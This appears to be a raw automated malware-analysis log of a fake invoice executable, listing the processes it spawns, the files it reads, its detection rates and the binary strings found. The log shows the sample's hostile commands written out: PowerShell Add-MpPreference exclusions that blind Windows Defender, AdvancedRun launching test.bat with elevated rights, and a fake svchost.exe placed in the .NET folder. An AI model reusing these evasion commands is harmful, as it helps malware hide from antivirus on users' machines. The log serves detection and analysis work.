        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: CN-Invoice-XXXXX9808-19011143287994.exe | Virustotal: Detection: 29%
        Source: CN-Invoice-XXXXX9808-19011143287994.exe | ReversingLabs: Detection: 27%
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | File read: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
        Source: unknown | Process created: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe'
        Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008
        Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
        Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: unknown | Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
        Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
        Source: unknown | Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180
        Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /SpecialRun 4101d8 6980
        Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Process created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Windows\explorer.exe | Process created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
        Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180
        Source: C:\Windows\SysWOW64\WerFault.exe | Process created: unknown unknown
        Source: C:\Windows\explorer.exe | Process created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: CN-Invoice-XXXXX9808-19011143287994.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: CN-Invoice-XXXXX9808-19011143287994.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: shcore.pdb= source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp
        Source: Binary string: .pdb>X source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbR source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: System.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ml.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: winnsi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: .ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: clr.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: ility.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: urlmon.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.PDB source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: System.Configuration.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ml.pdbe source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdbx source: WerFault.exe, 00000011.00000003.772085355.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb&;$ source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854050240.000000000122B000.00000004.00000020.sdmp
        Source: Binary string: System.Xml.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: System.Core.pdb" source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: shell32.pdb{ source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbN source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdbq source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: mscoree.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Core.pdb, source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: rasapi32.pdbe source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: profapi.pdbc source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854050240.000000000122B000.00000004.00000020.sdmp
        Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdbS source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: nsi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: powrprof.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb3 source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: mscorlib.pdb" source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: msasn1.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: comctl32v582.pdbX source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: cldapi.pdb5 source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: combase.pdb source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rasman.pdb} source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb+ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Accessibility.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: version.pdb/ source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ml.ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: dhcpcsvc6.pdbo source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: nsi.pdbX source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb) source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: Accessibility.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rawing.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: winhttp.pdb\ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdbw source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdbk source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: CN-Invoice-XXXXX9808-19011143287994.PDB source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: mscorlib.ni.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: shcore.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: fltLib.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: edputil.pdb! source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: winnsi.pdb[ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: shell32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.ni.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: propsys.pdb9 source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
